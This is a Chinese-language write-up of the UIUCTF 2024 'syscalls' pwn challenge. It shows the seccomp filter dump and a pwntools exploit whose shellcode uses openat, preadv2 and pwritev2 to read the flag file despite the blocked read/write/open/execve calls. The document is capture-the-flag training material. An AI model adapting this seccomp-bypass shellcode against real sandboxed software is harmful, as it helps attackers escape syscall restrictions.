UIUCTF2024PWNIUICTF2024 syscalls 查看沙箱不能用execve，那就用变种ORW，还好之

IUICTF2024

syscalls

查看沙箱

└─# seccomp-tools dump '/home/ben/Desktop/attack_world/UIUCTF2024/syscall/syscalls'
The flag is in a file named flag.txt located in the same directory as this binary. That's all the information I can give you.
1
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x16 0xc000003e  if (A != ARCH_X86_64) goto 0024
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x13 0xffffffff  if (A != 0xffffffff) goto 0024
 0005: 0x15 0x12 0x00 0x00000000  if (A == read) goto 0024
 0006: 0x15 0x11 0x00 0x00000001  if (A == write) goto 0024
 0007: 0x15 0x10 0x00 0x00000002  if (A == open) goto 0024
 0008: 0x15 0x0f 0x00 0x00000011  if (A == pread64) goto 0024
 0009: 0x15 0x0e 0x00 0x00000013  if (A == readv) goto 0024
 0010: 0x15 0x0d 0x00 0x00000028  if (A == sendfile) goto 0024
 0011: 0x15 0x0c 0x00 0x00000039  if (A == fork) goto 0024
 0012: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0024
 0013: 0x15 0x0a 0x00 0x00000113  if (A == splice) goto 0024
 0014: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0024
 0015: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0024
 0016: 0x15 0x07 0x00 0x00000142  if (A == execveat) goto 0024
 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023
 0018: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # writev(fd, vec, vlen)
 0019: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0023
 0020: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0024
 0021: 0x20 0x00 0x00 0x00000010  A = fd # writev(fd, vec, vlen)
 0022: 0x25 0x00 0x01 0x000003e8  if (A <= 0x3e8) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

不能用execve，那就用变种ORW，还好之前没事存了一些变种。

PWN堆溢出技巧：ORW的解题手法与万金油Gadgets-安全客 - 安全资讯平台

PWN-ORW总结 - X1ng's Blog

[CTF]-PWN：ORW题型综合解析_pwn orw-CSDN博客]

O用openat替代。

R和W用preadv2和pwritev2的组合替代。

from pwn import *

context(arch='amd64',os='linux',log_level='debug')
shellcode = shellcraft.openat(-100, 'flag', 0, 0) # O:openat

shellcode += """
/* R:preadv2 */
        mov rdi, rax
        mov rax, 327
        mov r12, rsp
        add r12, 0x50
        mov r11, 0x50
        push r11
        push r12
        mov rsi, rsp
        mov rdx, 1
        mov r10, -1
        mov r8, 0
        syscall
/* W:pwritev2 */
        mov rax, 328
        mov rdi, 1
        syscall
"""

payload=asm(shellcode)
p=process("/home/ben/Desktop/attack_world/UIUCTF2024/syscall/syscalls")
p.sendlineafter(b"I can give you.",payload)
p.interactive()